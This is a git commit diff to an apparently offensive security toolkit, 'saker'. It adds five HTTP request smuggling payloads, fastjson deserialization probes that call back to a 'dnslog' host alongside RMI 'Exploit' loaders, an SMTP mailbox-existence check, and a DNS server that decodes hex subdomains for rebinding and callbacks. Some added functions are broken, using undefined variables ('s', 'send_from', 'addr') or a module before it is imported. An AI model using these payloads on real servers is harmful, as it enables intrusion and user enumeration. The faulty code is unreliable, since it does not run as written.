add some scripts

LyleMi · May 18, 2020 · df36ea0 · df36ea0
1 parent 5af136b
commit df36ea0
Show file tree

Hide file tree

Showing 6 changed files with 172 additions and 15 deletions.
diff --git a/saker/api/todo.md b/saker/api/todo.md
@@ -1,16 +1,19 @@
 # Information Gathering
 
-https://web.archive.org
-https://virustotal.com
-https://www.binaryedge.io
+http://dns.bufferover.run
+https://findsubdomains.com
+https://hackertarget.com
+https://hunter.io
+https://riddler.io
 https://securitytrails.com
 https://sslmate.com/certspotter
+http://www.skymem.info
 https://threatminer.org
-http://dns.bufferover.run
-https://hackertarget.com
+https://virustotal.com
+https://web.archive.org
+https://www.binaryedge.io
 https://www.entrust.com/ct-search/
-https://riddler.io
-https://findsubdomains.com
+https://www.email-format.com
 
 # CI
 

diff --git a/saker/brute/email.py b/saker/brute/email.py
@@ -1,6 +1,7 @@
 #!/usr/bin/env python
 # -*- coding: utf-8 -*-
 
+import random
 import smtplib
 
 from saker.brute.brute import Brute
@@ -78,3 +79,15 @@ def srvInit(self, srv):
             smtpServer.ehlo()
             smtpServer.starttls()
         return smtpServer
+
+    def verify(self, mail, srv):
+        helo = s.docmd('HELO example.com')
+        s.docmd('MAIL FROM:<%[email protected]>' % random.random())
+        s.docmd('RCPT TO:<%s>' % mail)
+        if send_from[0] in [250, 451]:
+            # 邮箱存在
+            return True
+        elif send_from[0] == 550:
+            return False
+        else:
+            return None
diff --git a/saker/core/rawhttp.py b/saker/core/rawhttp.py
@@ -1,5 +1,8 @@
+import ssl
 import socket
 
+from urllib.parse import urlparse
+
 
 class RawHTTP(object):
 
@@ -8,29 +11,45 @@ class RawHTTP(object):
 
     def __init__(self):
         super(RawHTTP, self).__init__()
+        self.socket = None
 
-    @classmethod
-    def construct(cls, method='GET', url='/', headers={}, body='', version='HTTP/1.1'):
-        data = cls.template
+    def construct(self, method='GET', url='/', headers={}, body='', version='HTTP/1.1'):
+        data = self.template
         data = data.replace('<method>', method)
         data = data.replace('<request-URL>', url)
         data = data.replace('<version>', version)
         strHeader = ''
         if len(body) > 1:
             headers['Content-Length'] = len(body)
         for k in headers:
-            strHeader += '%s: %s%s' % (k, headers[k], cls.split)
+            strHeader += '%s: %s%s' % (k, headers[k], self.split)
         data = data.replace('<headers>', strHeader)
         data = data.replace('<entity-body>', body)
         return data
 
-    @classmethod
-    def sendBytes(cls, addr, port, req):
-        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-        s.connect((addr, port))
+    def sendBytes(self, url, req):
+        url = urlparse(url)
+        if self.socket is None:
+            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        else:
+            s = self.socket(socket.AF_INET, socket.SOCK_STREAM)
+        if url.scheme == 'https':
+            context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
+            context.verify_mode = ssl.CERT_NONE
+            s = context.wrap_socket(s, server_hostname=url.hostname)
+        s.connect((addr, url.port))
         if isinstance(req, str):
             req = req.encode()
         s.send(req)
         resp = s.recv(4096)
         s.close()
         return resp
+
+    def setProxy(self, addr, port, username=None, password=None, proxy_type=socks.SOCKS5):
+        # pip install PySocks
+        import socks
+        socks.set_default_proxy(
+            proxy_type, addr=addr, port=port, username=username, password=password
+        )
+        # socket.socket = socks.socksocket
+        self.socket = socks.socksocket
diff --git a/saker/fuzzers/httpSmuggle.py b/saker/fuzzers/httpSmuggle.py
@@ -0,0 +1,85 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+from saker.fuzzers.fuzzer import Fuzzer
+
+
+class HTTPSmuggle(Fuzzer):
+
+    """HTTPSmuggle"""
+
+    def __init__(self):
+        super(HTTPSmuggle, self).__init__()
+
+    def CLGET(self, host="example.com"):
+        payload = [
+            "GET / HTTP/1.1\r\n",
+            "Host: %s\r\n" % host,
+            "Content-Length: 44\r\n",
+            "\r\n",
+            "GET /secret HTTP/1.1\r\n",
+            "Host: %s\r\n" % host,
+            "\r\n",
+        ]
+        return ''.join(payload)
+
+    def CLCL(self, host="example.com"):
+        payload = [
+            "POST / HTTP/1.1\r\n",
+            "Host: %s\r\n" % host,
+            "Content-Length: 8\r\n",
+            "Content-Length: 7\r\n",
+            "\r\n",
+            "12345\r\n",
+            "a",
+        ]
+        return ''.join(payload)
+
+    def CLTE(self, host="example.com"):
+        payload = [
+            "POST / HTTP/1.1\r\n",
+            "Host: %s\r\n" % host,
+            "Connection: keep-alive\r\n",
+            "Content-Length: 6\r\n",
+            "Transfer-Encoding: chunked\r\n",
+            "\r\n",
+            "0\r\n",
+            "\r\n",
+            "a",
+        ]
+        return ''.join(payload)
+
+    def TECL(self, host="example.com"):
+        payload = [
+            "POST / HTTP/1.1\r\n",
+            "Host: %s\r\n" % host,
+            "Content-Length: 4\r\n",
+            "Transfer-Encoding: chunked\r\n",
+            "\r\n",
+            "12\r\n",
+            "aPOST / HTTP/1.1\r\n",
+            "\r\n",
+            "0\r\n",
+            "\r\n",
+        ]
+        return ''.join(payload)
+
+    def TETE(self, host="example.com"):
+        payload = [
+            "POST / HTTP/1.1\r\n",
+            "Host: %s\r\n" % host,
+            "...",
+            "Content-length: 4\r\n",
+            "Transfer-Encoding: chunked\r\n",
+            "Transfer-encoding: cow\r\n",
+            "\r\n",
+            "5c\r\n",
+            "aPOST / HTTP/1.1\r\n",
+            "Content-Type: application/x-www-form-urlencoded\r\n",
+            "Content-Length: 15\r\n",
+            "\r\n",
+            "x=1\r\n",
+            "0\r\n",
+            "\r\n",
+        ]
+        return ''.join(payload)
diff --git a/saker/fuzzers/json.py b/saker/fuzzers/json.py
@@ -30,6 +30,16 @@ class JSON(Fuzzer):
         """{\"@type\":\"br.com.anteros.dbcp.AnterosDBCPConfig\",\"metricRegistry\":\"rmi://localhost:1099/Exploit\"}""",
         # JtaTransactionConfig
         """{\"@type\":\"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig\",\"properties\":{\"UserTransaction\":\"rmi://localhost:1099/Exploit\"}}""",
+        # https://paper.seebug.org/1192/
+        """{"rand1":{"@type":"java.net.InetAddress","val":"http://dnslog"}}""",
+        """{"rand2":{"@type":"java.net.Inet4Address","val":"http://dnslog"}}""",
+        """{"rand3":{"@type":"java.net.Inet6Address","val":"http://dnslog"}}""",
+        """{"rand4":{"@type":"java.net.InetSocketAddress"{"address":,"val":"http://dnslog"}}}""",
+        """{"rand5":{"@type":"java.net.URL","val":"http://dnslog"}}""",
+        """{"rand6":{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://dnslog"}}""}}""",
+        """{"rand7":Set[{"@type":"java.net.URL","val":"http://dnslog"}]}""",
+        """{"rand8":Set[{"@type":"java.net.URL","val":"http://dnslog"}""",
+        """{"rand9":{"@type":"java.net.URL","val":"http://dnslog"}:0""",
     ]
 
     def __init__(self):

diff --git a/saker/servers/socket/dnsrebinding.py b/saker/servers/socket/dnsrebinding.py
@@ -28,6 +28,24 @@ def _getRecord(self, qname):
         return record, ttl, recordType
 
 
+class HexServer(socketserver.UDPServer):
+
+    def __init__(self):
+        socketserver.UDPServer.__init__(
+            self, ('0.0.0.0', 53), RequestHandler
+        )
+
+    def getRecord(self, qname):
+        payload = qname.split('.')[0]
+        try:
+            record = bytes.fromhex(payload).decode()
+        except Exception as e:
+            record = '127.0.0.1'
+        ttl = 600
+        recordType = 'A'
+        return record, ttl, recordType
+
+
 class RequestHandler(socketserver.DatagramRequestHandler):
 
     def handle(self):
@@ -48,6 +66,10 @@ def handle(self):
 
 
 def main():
+    hexServer()
+
+
+def rebindingServer():
     values = {
         'result': ['8.8.8.8', '127.0.0.1'],
         'index': 0
@@ -56,5 +78,10 @@ def main():
     dnsServer.serve_forever()
 
 
+def hexServer():
+    dnsServer = HexServer()
+    dnsServer.serve_forever()
+
+
 if __name__ == '__main__':
     main()